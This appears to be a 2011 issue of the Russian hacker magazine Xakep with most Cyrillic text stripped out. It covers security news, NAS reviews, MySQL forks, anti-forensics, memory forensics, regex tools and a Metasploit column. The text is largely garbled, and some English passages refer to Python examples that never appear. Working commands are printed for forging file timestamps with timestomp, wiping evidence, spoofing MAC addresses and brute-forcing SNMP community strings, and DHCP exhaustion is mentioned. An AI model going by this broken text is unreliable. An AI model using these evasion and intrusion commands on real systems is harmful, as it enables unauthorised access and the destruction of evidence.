
x 03 (146) 2011

.
210
:

PALEVO: C . 74


MySQL /

MySQL


WINDOWS

. 44



. 22

146


HACKQUEST 2010
RETURN-ORIENTED ROOTKITS
NAS

APPLESCRIPT
PYTHON



. 28

INTRO
, ?
, , .
,
,
.
, , .
: ,
, .
.
, , , .
,
,
.
, IT, ,
.
- ,
. , -

INTRO

1 .
, , ,
.
, 120 varchar(20) ,

, ,
. , ,
,
, , ,
.
,
, . ,
:).
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

CONTENT
MegaNews

004

082

088

094

- -

FERRUM
016

NAS

PC_ZONE
022

MySQL

028

-,

034

038

,
?

Memoryze

Liberte Linux:

098

Return-Oriented Rootkits !

102

Mac OS X

106

AIR'

112

115

iPhone Mac OS X

AppleScript

Adobe AIR
-

040

Easy-Hack

044

SYN/ACK

050

118

DLP-?

056

122

060

128

066

... !

072

X-Tools

Windows

HackQuest 2010

MALWARE

Mac OS X
Apple

Microsoft Oracle

132

074

Palevo!

138

FAQ UNITED

078

Python

142

144

WWW2

FAQ

8.5

web-

066

... !

HackQuest 2010

022

MySQL

,
?

074
Palevo!

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
Hi-Fi
(khamidulina@glc.ru)

>
(alekhina@glc.ru)
(nesterova@glc.ru)
>


>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>

>

>
(kosheleva@glc.ru)
>

>

>



> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
159 916 .

.

. ,
,
.


.
.


:
content@glc.ru
, , 2011

MEGANEWS

Mifrill (mifrill@gameland.ru)

Meganews

GSM
GSM- ( , ),
(, Kraken,
A5/1). , ,
,
-.
(
). GSM- , , .
, , . Chaos
Computer Club Congress ,
GSM- -,

$15. GSM-
Security Research Labs
, GSM OsmocomBB. GMS- ,
. :
SMS-,
. , ,
.

,
,

( ).
, ,
. GSM-:
,

. ,
. 64-
, . . ,
( , ),
, -,

.
: events.ccc.de.

100 BitTorrent,
- .

ZEUS + SPYEYE = ?


ZeuS SpyEye ,
,
.
, SpyEye ,
.
, , , ,
,
SpyEye, Gribodemon/Harderman.
, . SpyEye,
ZeuS. : Trusteer Rapport,
. ,
Jabber, VNC,
. ,
Firefox.
SpyEye Windows, ,
ffcertgrabber, ,
. , ,
Trend Micro,
. , .

MEGANEWS

IT-
. Apple,
. , 2009 ,
. ,
,
, .
,
.
Apple ,
2009.
Google ,
, .

. ,
2001 , Google
,
.

,
Panda Labs, $2. $80
. ,
$82 000, $700.


Trend Micro
, WORM_RIXOBOT.A ( TROJ_RANSOM.
QOWA).
, .

2010 137 000 .
: , Trend Micro
.

,
.
, SMS 2 500 , 2%
. ,
SMS 360 , ,

901 245 ($29.5 .). ,
, , ,
100 000 000 . , -
,
?

MEGANEWS

. FACEBOOK.

,
, .
.
Facebook,
, .
Gmail Yahoo , , Facebook, . ISP
JavaScript, HTTPS HTTP
.
(, ,
2010, -
HTTPS). , URL,
.
ISP. ? ,
. , Facebook
. Facebook
,
, . -

, 5- ,

, !
, ,
, Facebook
. , ,
, !
, , Facebook
. 10-
: HTTPS- (- ISP
HTTP, -
), . , ,
.
, ,
Facebook .

51,8% Android 2.2


Google. 2.3
0.4% .


,

.
(, )
,
, WirelessHD, WHDi WiDi.

Wireless
USB-, ,
.
, ,
.
, , USB-,

.
KFA2 NVIDIA GeForce
GTX 460 WHDI. ,
,
WHDI (Wireless Home Digital Interface).

WHDI- ( , ?),
.
,
. WHDI


(
!), FullHD
(1080p). , , GeForce
GTX 460 WHDI 1 GDDR5
256- ,
, CUDA.

,
-! :)

. .
,
,
.


MEGANEWS

, ,
.
, ...
, .

. 26- (.
146 ).
,
. , , ,
! . 26-
,
(
), 200 000.


108 000 .
, , . , ,
,
,
.

80
CES 2011, -.


,
. ,
, .
LG, LED- E90 c 21.5. ,
, ,
7.2 !
, -

( 40% ,
-
CCFL)
. E90
.
(D-sub, DVI-D, HDMI)
EZ-cabling.
: 2
, 1920x1080. 13 000 .


CES
eCoupled. eCoupled
( ),
90%
10% .

. ,

, ,
Tesla Roadster.
eCoupled, , (
).

.



APP STORE
Apple
Mac App Store
.
App Store ( iPhone,
iPod touch iPad),
,
Mac OS.
App Store:
, ,
.
iTunes ,

. Mac App Store
, .
Mac OS X Snow Leopard.
Mac
Linux :
, Microsoft
?. , .
?

107 . , , 89,1% (
Pingdom).

HOTMAIL


Windows Live Hotmail Microsoft. ,
, Hotmail ,
(, ).
,
. ,
, , ,
Hotmail. Windows Live
:
.
,
. Microsoft ,
,

, .
, , ,
, . .


MEGANEWS



CES (Consumer Electronics Show),
- ,
. , Motorola Atrix 4G,
. Motorola
,
. , . , Atrix 4G HDMI-
, USB-
( -),
. -,
- 11.6, ,
, .
,
- .
, Atrix 4G ? : Motorola Atrix 4G ,
, .
4- (960540 )
NVIDIA Tegra 2
1 . Android 2.2,
2.3. ,

1930 ,
9 , 136 .
, (5
), VGA- ,
Wi-Fi 802.11b/g/n, Bluetooth, GPS, miroSD .
, ,
. , ,
Motorola,
, .

10 Wikipedia 15 . .

3D
Avenue Q, :
Internet is for porn ( ), .
,

.
. ,
,


,


.
:
Kinect Microsoft XXX (, ,
). 3D-
3D-. , , 3D ,

. ,

3D
, . ,
,
3D-. ,
: ,
, , -
3D-
. , ,
:).

WINSTON FREEDOM MUSIC


2010
Winston Freedom Music.
Super Jam Sessions,
, .
,
- Kaiser Chiefs,
, Grammy MTV Music
Awards, Dirty Vegas.



MICROSOFT
,
Apple Magic Mouse.

,
. :
Apple
Microsoft. ,
Touch Mouse, , , .
: . ,
, ,

.
,
, ,
. BlueTrack
,
.

. Touch Mouse
USB- Snap-in Nano, 2.4 .
,
Amazon.com
. $79.95.

ITUNES-


iTunes, Apple
. ,
, Apple ,

.
TaoBao ( Ebay)
50 000 iTunes

.
, .

Apple, ,
( ,
). ,


iTunes?
,
, ,
(
). , ,
.
PayPal, ,

iTunes , ,
iTunes,
Apple.

MS
, GeoHot,

iPhone PlayStation 3.
(geohot.com)

Windows Phone 7,
Microsoft. ,

. ,
Microsoft
WP7-

. : GeoHot,
WP7,
e-mail,
WP7-!. ,
, Microsoft
, .
: MS
ChevronWP7
( WP7)
.


MEGANEWS

SMS

, ? , , , , .
27C3,
.
,

, MMS ,
. , , , , SMS
-
.
GSM-,
120 000 SMS. , ,
- .

Samsung, Sony Ericsson, Motorola LG. ,
SMS-.

45% PayPal.
, OpenDNS.

DDR4 SAMSUNG
Samsung
DDR4, , 3 . ,
, ,
, 40%
, DDR3, 1.5 ,
. ( DDR4
1.05 )
Pseudo Open Drain (POD),
/. 2.133 /
1.2 ( DDR3,
1.35 1.5 , 1.6 /). JEDEC
DDR4 .

MOZILLA
Mozilla Foundation , , , , 44
000 ,
addons.mozilla.
org. -
, , .
Mozilla ,
,
,



2009 . ,
,
MD5. ,

,
.
Mozilla, , ,
,
,
Mozilla.



FERRUM

: Intel Core 2 Duo E4700


( 3500 )
: ASUS P5QC
: 2x1024 ,
Kingston , DDR2-800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32

D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

NAS
,
, , .
HDD ,
, , .
NAS .

NAS : Network Attached Storage


. , ,
. ,
, NAS
,
. . , NAS
,
, - -, , IP- . NAS
,
RAID. , , . ,
, , ,
RAID 0 ( , Ethernet
). ,
, RAID 1 RAID 5,
.
(USB, eSATA ), -


,
NAS . -,
.


NAS
: Thecus N3200
HDD , ,
. 2 Hitachi. ,
,
Intel NAS Performance Toolkit,
NAS-, , ,
-, .
RAID 5
RAID 0. ,
, , , , ,
.

13500 .

22000 .

D-Link
DNS-343

NETGEAR
ReadyNAS NVX

: CIFS/SMB, FTP, UPnP, http


: -, -, torrent-, iTunes
: RAID 0, RAID 1, RAID 5, JBOD, Standard
: 128
: ARM926EJ
: Ethernet (10/100/1000 /), USB

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour
: -, -, torrent-, iTunes, ReadyNAS Remote
: X-RAID2, RAID 0, RAID 1, RAID 5
: 1
: Intel EP80579 1
: 2xEthernet (10/100/1000 /), 3xUSB

D-Link DNS-343, , : ,

. -,
, IP , ,
. , D-Link DNS-343
.

ReadyNAS NVX - ,
- . , .
,
LCD-, .
, .
, .
ReadyNAS NVX, ,
.
X-RAID2, -.

, .
, , USB . , D-Link DNS-343 . ,
.


ReadyNAS NVX
[O2], :
.


FERRUM

31000 .

27000 .

QNAP
TS-459 Pro

Synology
Disk Station DS411+

:CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, JBOD
: 1
: Intel AtomD510 1.66
: 2xEthernet (10/100/1000 /), 5xUSB, 2xeSATA, VGA

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -,mail-,
torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 1
: Intel Dual-core 1.67
: Ethernet (10/100/1000 /), 2xUSB, eSATA

QNAP
. 5 USB,
,
eSATA, VGA. QNAP TS-459 Pro Intel Atom , 1.66
Hyper Threading. 1
DDR2 . ,
, ,
, NAS. , .

Synology Disk Station DS411+


.
-, - PHP/
MySQL. , IP-, Synology
Disk Station DS411+ . .
, ,
.

, , . , , .


, , Synology Disk Station DS411+


: USB eSATA. ,
. ,
,
, .

14500 .

9000 .

Synology
Disk Station DS410j

Thecus
N3200

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -,
mail-, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 128
: ARM 800
: Ethernet (10/100/1000 /), 2xUSB

: CIFS/SMB, FTP, http, AFP, NFS, DLNA,


: -, -,
torrent-, iTunes.
: RAID0, RAID1, RAID5,JBOD
: 256
: AMD Geode LX800 500
: 2xEthernet (10/100/1000 /), 2xUSB, eSATA

Synology .
, ,
, DS411+.
, , -, :

.
Synology Disk Station DS410j ,
.

, Synology Disk Station DS410j , USB


. USB, .


,
. ,
, , . , RAID5 Thecus N3200
. ,
HDD,
. AMD. :
-, -,
.
, .

, , Thecus N3200 .
, , .
.


FERRUM

INTEL NAS PERFORMANCE TOOLKIT, RAID 0


D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459 Pro
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

Photo Album

File copy from NAS

File copy to NAS

HD Video Playback
0,0

20,0

40,0

60,0

80,0

100,0

120,0

140,0

QNAP TS-459 Pro Synology Disk Station DS411+

INTEL NAS PERFORMANCE TOOLKIT, RAID 5


D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459 Pro
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

Photo Album

File copy from NAS

File copy to NAS

HD Video Playback
0,0

20,0

40,0

60,0

80,0

100,0

120,0

140,0

RAID5

, NAS,
. QNAPTS-459 Pro
, .


Thecus N3200
.

, Synology Disk Station
DS411+. z

PC_ZONE
aleks.raiden@gmail.com


MySQL

,
Oracle
Sun, MySQL?
? .
!
MySQL, . , , .
. - -.
, , .

MySQL. ,
Sun
Oracle. ,
,
MySQL.
. Oracle, , , : - .
.


5.5, , :
, . ? MySQL , ,
. .

, MySQL.
, ?
, PostgreSQL. ! MySQL,
.
. ,
(

MariaDB
MariaDB
).
- MySQL? .
(
MySQL), ,
.
MySQL
,
.
, .

, ,
,
.

InnoDB,
Oracle. , MariaDB.

MariaDB

2008 ,
MySQL, ,
,
, MySQL.
MyISAM,
, ,
. -

MySQL,


MariaDB? ,
,
SQL MySQL.
:
.
?,
.
, , ,
. ,
Sphinx,
,
.
, (
, Google Facebook)
MariaDB.
,
.
,
. MariaDB
,
.

InnoDB MyISAM, MariaDB
, . Aria
MyISAM

. MyISAM
,
, Aria ,
.
MariaDB ,
. Oracle
InnoDB XtraDB,
Percona.
MySQL
, .
( )
.
MySQL XtraDB
MariaDB , InnoDB.

HTTP://WWW
links
SkySQL: skysql.com;
MariaDB: mariadb.org;
Percona: percona.com;
Drizzle: drizzle.org;
MySQL: mysql.com;
HandlerSocket: bit.ly/a9B7Gh.

INFO

info


Oracle

,

$2 000 000,



$300 000.
,
,


.


PC_ZONE

?
,
. , , API .
, , (
),
.
( + ) ,
.
,
. MySQL .
InnoDB (, )
,
. ,
MariaDB Drizzle, .
MySQL- .
InnoDB , 5.5
- . , , . .
MyISAM ,
. ,
.
MySQL,
.
Aria MyISAM .
MyISAM.
CVS ,
, .
Federated/FederatedX

() .
, ,
.

XtraDB : . ,
InnoDB, :).
,
( ?) MySQL.
Google , , ,
, MySQL
.
XtraDB
I/O, -
.
,

, .
, ,
.
SHOW ENGINE INNODB STATUS.
: ,
, ,
, MySQL. :
,
.
.
, Firebird
PosgreSQL, , -


PBXT InnoDB ,
, ,
.
.
Blackhole , ,
, /dev/null
. .
Archive ,
. ,
. , .

.
XtraDB InnoDB Percona.
MERGE Federated
.
MEMORY ,
, .
, .
BlitzDB MyISAM
. .
NDB , , , .
Falcon MySQL AB, Sun,
InnoDB.
SphinxSE
Sphinx.
. , .
MVCC (Multiversion Concurrency Control
,

) . MariaDB PBXT,
, . , , ! PBXT
,
, -

, MySQL ...


MySQL
. ,
,
, .
, - - ,
,
. FederatedX,

, OQGRAPH,
, . , Facebook ,
, .

Percona?
Percona, .
, c
, ,

MySQL. ,
Percona MySQL
.
,
.
Percona
5.1,
5.5, Oracle.
PBXT, ,
Percona.
, .


Handlersocket-, InnoDB
NoSQL . ,
, 750 000

Cloud Computing

Drizzle
. ,
: cloud computing, Google Proto Buffers, ,
. :
,
, , CRM-.
MySQL,
,


PC_ZONE

NoSQL-
NoSQL. ,

SQL-
- (key-value).
/ (
Redis) , , JSON ( MongoDB). , , ,
,
SQL- ? : Yoshinori
Matsunobu HandlerSocket, InnoDB NoSQL-,
SQL. : 750 000 ! , Percona ,
. ! , ,
,
, Drizzle
?
.
UNIX- ( ,
) Windows.
Drizzle
. ?
, , ,
. Google Protocol Buffer. , ,
. ,
.
MySQL-,
libdrizzle
, Perl, PHP, Python
Lua.
: MySQL.
Gearman (.
), Drizzle

Drizzle


, memcache ,
RabbitMQ ( WebSocket).
Drizzle InnoDB,
. XtraDB PBXT.
Drizzle MySQL 5.0,
.
. Drizzle , .

MySQL, Oracle , , ,
. MySQL
, LAMP (LinuxApache-MySQL-PHP).
,
MySQL. . , 100%
.
: ,
. ,
.
,
,
,
. MariaDB
.
, Drizzle.
,
.

Oracle Percon.
,
,
MySQL,
. ?
! z

, ,


PC_ZONE
Ant (antitster@gmail.com)

-,

, ,
.
, , ,
, .
, .
!


? : ,
.
- , (, R-Studio). , .
-,

, .
,

,
.
.
- !


. , ,
. ,
.
(
).
- Windows
Thumbs.db. ,
,


sdelete


Thumbs.db

.
, .
, ,
JPEG ( ).

. Thumbs.db ( , ). Thumbnail Database Viewer
(itsamples.com/thumbnail-database-viewer.html). ,
, . SDelete (technet.microsoft.com/ru-ru/sysinternals/bb897443)
: sdelete.exe -p 2 file1.jpg
- ,
, .

. , - Thumbs.


PC_ZONE

db? , ?
- ! ,
. ,
,
? Thumbs.db. Windows XP: DisableThumbnailCache = 1 under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. Windows 7: NoThumbnailCache under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. , ,
Thumbs.db.

Thumbs.db

.
, ,
<Shift+Delete> . , ,
.
, . ,
,
, .
,
, . ,
, NTFS. - :
JPEG. WinHex jfif.
274432. ,
( HDD Wipe Tool) . ,
WinHex, 274432,
.
DiskDigger, Photorec, Foremost .
.
, , ,
, ? , . ,
. ,
. ASCII. ,

. , anti,
: 01100001 01101110 01110100 01101001. , ,
anth. . . ,
,
, .
.

,
-.
.



Foremost

.

, .
. , ,
(
).
(pagefile.sys) , Hibernation (hiberfil.sys).
,
. , .
, :

. , Back Track,
, . , LiveCD, BackTrackForensic,
Foremost.

.
, , , :
# foremost -i /mnt/hda1/pagefile.sys -o /root/Desktop/page_file -v -q

/mnt/hda1/pagefile.sys, /root/Desktop/page_file. .

Foremost

AccessData FTK Imager

,

mp3jpgmp3jpgmp3jpg
Foremost 524
.

jpg:= 73
gif:= 4
gif:= 19
jpg:= 77
jpg:= 95
doc:= 1
pgp:= 65
pgp:= 62
pgp:= 44
pgp:= 36
dat:= 7
lnk:= 3
cookie:= 38


.
, jpg.



COOKIE
,

,

YOUTUBE.
, .
: ,
; -; Facebook
. ,
.
, doc-,
. , , Word
, .
cookie
,
,
YouTube. ,
,
.
? . .
Control Panel > System and Security > System > Advanced System Settings > Performance > Advanced > Virtual Memory > Change > No paging file.

.
,
ClearPageFileAtShutdown = 1 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management. , ,
,

. hiberfil.sys.

INFO

info


:
Eraser 6.0.8: eraser.heidi.ie;
SDelete 1.51: technet.microsoft.com/ru-ru/sysinternals/bb897443;
Freeraser: codyssey.com/products/freeraser.html;
Overwrite 0.1.5: kyuzz.org/antirez/overwrite.html;
Wipe 2.3.1: wipe.sourceforge.net;
Secure Delete: objmedia.demon.co.uk/freeSoftware/secureDelete.html;
CCleaner 3.03: piriform.com.

DVD
dvd



.


PC_ZONE


DiskDigger

,
. ,
. , FTK Imager (accessdata.com/support/adownloads).
FileAdd Evidence Item ,
.
, pagefile.sys .
,

. , ,
DiskDigger (diskdigger.org) PhotoRec (www.cgsecurity.org/wiki/PhotoRec). ,
.

-.
.
WinHex. ,
. WinHex,
Open Disk .
(Ctrl+A)
(Ctrl+L). ,
.
, , .
NTFS. Windows
XP FAT, NTFS.
,
,
Optimize for performance.
NTFS.
,
. .
jpeg- - (, jpeg) : 1.mp3, 1.jpg, 2.mp3, 2.jpg, 3.mp3, 3.jpg.
, ?
, DiskView (technet.microsoft.com/ru-ru/sysinternals/bb896650). ,
, (
). , . , <Refresh>. ,
, ,
, .
, . <Refresh> , jpeg-
. WinHex.
, ,
: jfif, jpeg-. ,
, ,
. , :
, :). , , :
C:\Documents and Settings\Administrator>defrag h:
Windows Disk Defragmenter
Copyright (c) 2001 Microsoft Corp. and Executive
Software International, Inc.
Analysis Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)

0%

Defragmentation Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)

0%

, , .
<Refresh> DiskView, ? ,
,
, . !
, ,
?
, . jfif. -, !
.
DiskDiggera
Photoreca. ,

274432

DiskDigger
6 3

274432
-
.
Sdelete
,
. ,
- .
!

, ,
? . , ,
. ,
// .
? metasploit.com
, Timestomp (metasploit.com/data/antiforensics/timestomp.exe), ,
. :
-m <date>  modified time
-a <date>  accessed time
-c <date>  created time
-e <date>  MFT entry modified time
-z <date>  all four at once





, MFT

DiskDigger
: DayofWeek Month\Day\Year
HH:MM:SS [AM|PM]. -b, ,
EnCase :). ,
,
: timestomp.exe boot.ini -z "sunday 1/12/2099 10:00:00 pm". ,
.
:
for /R c:\tools\ %i in (*) do timestomp.exe %i -z "monday 3/12/2009 10:00:00 pm"
-
HDD. ,
, . -,
, .
DefCon: isecpartners.com/files/iSEC-Breaking_Forensics_Software-Paper.v1_1.BH2007.pdf.

. , .
,
, ,
.

.
:). z


PC_ZONE
Step twitter.com/stepah

Memoryze


live, .
, , ,
-,
,
.
, .
, , .


,
, .
Mandiants Memoryze ,
.

Memoryze
, ,
. Memory Forensic.
( Memoryze)
, ,

. . , , (
, ) , ,

. ,
.
- ,
. ,
, .
, .

Memoryze?

Memoryze .
, must have,

, . ,
-
. ,

, . Mandiant:
mandiant.com/products/free_software.
, Memoryze:
(
API-),
;
, DLL EXE, (
);
;
, ,
,
(,


),
,
;
, ;
, , ;
;
(
);
.
, Memoryze,
, : Memoryze
GUI- Audit Viewer.
. Memoryze
, .
,
Audit Viewer,

.
,
.

, ,
. , portable,
: msiexec /a MemoryzeSetup.msi /qb TARGETDIR=<directory>.
Audit
Viewer,
.

, , . , Memoryze
.
batch .
, MemoryDD.bat, -
.
c memoryze.exe : G:\memoryze\MemoryDD.bat.
: -

HTTP://WWW
links
,



Audit Viewer.

c Memoryze

batch-.
,
,

Process.bat.

,

. ,
Process.bat ports
true


. ,
, GUI

.


PC_ZONE


Reverse Engineering?
Memoryze . , .
, , ,
,
.

.
:
ProcessDD.bat -pid <PID>
;
ProcessDD.bat -pid <PID> -input <filename>
.
:
DriverDD.bat -driver <drivername>;
DriverDD.bat -driver <drivername> -input <fname>.


. . ,
Memoryze kernel-mode ,
. .
, , - .
, .
,
. ,
. ,
( Memoryze/Audits).
, .
, .

, ,
Audit Viewer.

Memoryze. , .
, .
(, , ) .
. , , Memoryze Audit Viewer
, , (, Windows XP
SP1). ,
:
Windows 2000 Service Pack 4 (32-bit);
Windows XP Service Pack 2 and Service Pack 3 (32-bit);
Windows Vista Service Pack 1 and Service Pack 2 (32-bit);
Windows 2003 Service Pack 2 (32-bit);
Windows 2003 Service Pack 2 (64-bit);
Windows 7 Service Pack 0 (32-bit);
Windows 7 Service Pack 0 (64-bit);
*Windows 2008 Service Pack 1 and Service Pack 2 (32-bit);
*Windows 2008 R2 Service Pack 0 (64-bit).
,
-.
auditviewer.exe Configure
Memoryze. Open Existing



Results
.
Memoryze . :
(,
) . img-
.
,
, . ,
, , .
. :
Audit Viewer, .
.
,
, . , (Extract
strings) .

( ), , .
:
(Process Enumiration) ,
Extract Strings.
(Acquisition)
. ,
-
.
, Audit Viewer
, -.
, , , ( ).
, .

BAT-, Memoryze

DLL, ,
. :
, , , , .
.
.
, . Occurrences
(,
dll-).
Least Frequency of Occurrences
(LFO), .
, :
.
, , ,
. , .
.
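The Occurrences column and the Least Frequency of Occurrence (LFO) view described above are a counting exercise: a module loaded by every process is probably part of the OS, a module loaded by exactly one is worth a look. The following added example (not Mandiant's code) implements that triage over a constructed process list standing in for the memory image; the process names and module paths are made up.

```python
"""Added example, not Mandiant's code: the 'Occurrences' and least-frequency-
of-occurrence (LFO) idea from Audit Viewer, run over a constructed process
list instead of a memory image. Process names and module paths are made up."""
from collections import Counter, defaultdict

SYS = "c:\\windows\\system32\\"
# Constructed sample: process -> modules it has loaded (as a memory image would list them).
SAMPLE = {
    "explorer.exe": [SYS + "ntdll.dll", SYS + "kernel32.dll", SYS + "user32.dll"],
    "svchost.exe":  [SYS + "ntdll.dll", SYS + "kernel32.dll"],
    "lsass.exe":    [SYS + "ntdll.dll", SYS + "kernel32.dll"],
    "notepad.exe":  [SYS + "ntdll.dll", SYS + "kernel32.dll", SYS + "user32.dll",
                     "c:\\users\\public\\hook.dll"],
}


def occurrences(processes):
    """Count in how many processes each module appears (once per process),
    and remember which processes those are."""
    counts, where = Counter(), defaultdict(list)
    for proc, modules in processes.items():
        for module in sorted(set(m.lower() for m in modules)):
            counts[module] += 1
            where[module].append(proc)
    return counts, where


def ranked(processes):
    """Modules from rarest to most common: the LFO view."""
    counts, _ = occurrences(processes)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def least_frequent(processes, threshold=1):
    """Modules seen in at most `threshold` processes, with the process list.
    A triage heuristic, not proof: a rarely used but legitimate DLL shows up
    here too, so each hit still needs a look at its path, signature and hash."""
    counts, where = occurrences(processes)
    return sorted((m, where[m]) for m, n in counts.items() if n <= threshold)
```

Feed it the module lists Memoryze produces per process and the single-occurrence entries are the same ones Audit Viewer sorts to the top; a DLL outside a system directory with a count of one, as in the sample, is the shape of a hook or injected library.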

, .
Audit Viewer live-,
. ,
swap-, .
MRI (Memoryzes
Malware Rating),
.
- ,
. ,
, .
.

( MD5, SHA1, SHA256). ,
: , MD5.
. ,
img-, Acquire (and/
or) Analyze Live Memory. . ,

. ,
.
( ,

) Memory
Acquisition.

Memoryze?

Memoryze Audit Viewer


Memory Forensic. Volatility Framework
(volatilesystems.com). MiniGW Python Windows,
.
Linux (
bit.ly/VolatilityManual).
SANS
Investigative Forensic Toolkit
.
VMware (computerforensics.sans.org/community/downloads)
.
- , - ?
Memoryze.

.
:
, .
, Audit Viewer ,
. , .
(Occurrences
MRI)
, .
, Memory Forensic
, ,
( ). ,
,
. z

DVD
dvd



.


PC_ZONE
PC_ZONE
Step step@gameland.ru



?
, , , . ,
. ( )
- ,
. -
,
, -,
, -,
. .


. , , .
, ,
, .
,

,

.
,
.
,
, : sed grep.



: ,
.
-
,

. .

,
. , , ,

Wikipedia. ,
,
,
.
,


, ,
, . strfriend
(strfriend.com)
, .
.
-

. e-mail
^([^@\s]+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$
.
,
(. ).
,
,
( , ) , ,
.
Graphrex (crotonresearch.com/graphrex),
Eclipse.

RegexBuddy (regexbuddy.com),
.
( ) :
. ,
. ?

, , 2-

4- , A Z
0 9, RegexBuddy
: \A[A-Z0-9]{2,4}.
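A pattern that a tool visualises correctly can still misbehave once it is pasted into a validator, because of how the anchors and flags of the host language work. The following added example (not from the article or any of the tools named) runs the two patterns quoted above through Python's re module and shows the two pitfalls a practitioner hits most: `$` accepting a trailing newline, and a lowercase-only character class rejecting valid mixed-case input.

```python
"""Added example, not from the article: the two patterns quoted above run
through Python's re module, with the anchoring and case pitfalls a validator
built from such a pattern inherits."""
import re

EMAIL = r"^([^@\s]+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$"   # the strfriend example
CODE = r"\A[A-Z0-9]{2,4}"                              # the RegexBuddy example


def validate_naive(addr):
    """re.match + '$': '$' also matches just before a trailing newline,
    so 'user@example.com\\n' passes, and the domain must be lowercase."""
    return re.match(EMAIL, addr) is not None


def validate_strict(addr):
    """fullmatch forces the whole string to be consumed (no trailing newline
    slips through) and IGNORECASE accepts mixed-case domains."""
    return re.fullmatch(EMAIL, addr, re.IGNORECASE) is not None


def code_prefix(s):
    """\\A anchors at the real start of the string even in MULTILINE mode,
    which is why RegexBuddy emitted it instead of '^'."""
    m = re.match(CODE, s)
    return m.group(0) if m else None
```

The same `$` behaviour exists in Perl and PCRE (`\z` is the strict end anchor there), so the fix belongs in the pattern or in the matching call, not in the visualiser.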

,
(Perl,
C#, PHP, Python, Java, JavaScript ).


,
.
,
Expresso (ultrapico.com) The regulator
(sourceforge.net/projects/regulator). RegexBuddy ,
.

,

.
, ,
.

. RegexMagic (regexmagic.com). , ,

,
,
.

. z



GreenDog (agrrrdog@gmail.com)

Easy Hack
1

Metasploit,
MAC,
Oracle,
Zenmap

: GUI-
Metasploit Framework.

:
MSF GUI-, Java. , .
. Java- . . ,
.
/, . .
.
-, .
, :).
. (, ) Armitage. - . fastandeasyhacking.com.
Armitage, GUI, Java RPC MSF ( RPC,
- MSF,
Armitage ). GUI Java 1.6, (PostgreSQL
MySQL), MSF. Armitage ,
-.
. - :). ,
.
, MSF , . ,
.
:
fastandeasyhacking.com/media.
,
Armitage GUI. :

,
( MSF) :
ruby msfrpcd -P password -f

-P ( msf), -f ( Win).
3. Armitage , armitage.bat. ,
msfrpcd, . ,
MSF' %MSF%\
config\database.yml.
4. Connect :).

*nix.2.

:);
, ;
/ ;
.

1. Armitage , apt-get:
apt-get install armitage

2. Win- ( ruby ).

Incognito.

3. . BackTrack4 R2 MySQL:

Armitage
, MSF (
- ?).
MSF (msfupdate). , Win.
1. MSF.
, armitage.bat , icons; armitage
msf3, armitage data.
2. msfrpcd.
msfconsole loadxml, ,


MySQL:
/etc/init.d/mysql start
Armitage:
./armitage.sh

\ root\toor.
: Armitage
msfupdate.

: MAC- .

:
--, .
. , MAC- 48- , .
, MAC .
MAC . ,
- . MAC'
. MAC-,
- , .
Unix macchanger (alobbs.com/
macchanger). MAC,
( )
.

MAC-
ifconfig eth0 down
macchanger -a eth0

MAC eth0,
.
(Linux):
ifconfig ethN hw ether <mac-address>

Win TMAC
(technitium.com) ,
. , IP
DHCP,

:
, SNMP-.

:
SNMP (Simple Network Management Protocol)
(,
, ).
SNMP UDP-. 161 . SNMP .
1 ,
community string, UDP-.
. 2 3 , .
, IP
SNMP-. ,
UDP .
, ,
. community string' public
private / .
, public , .
, SNMP ,

.
:). , ' DoS- IP- . ,
DHCP. ,
MAC' IP. DHCP-
. MACIP 24
. , (
) IP-,
, :). Metasploit'
, DHCP Exhaustion.
, DNS MiTM. :
digininja.org/metasploit/dns_dhcp.php

, . , SNMP-

- , IBM Tivoli. .
-, 1 . -,
SNMP , .
-, -
ssh , SNMP
. UDP-.
. community, Metasploit':
:
use auxiliary/scanner/snmp/snmp_login
:
set RHOSTS ip_addr
run

, .
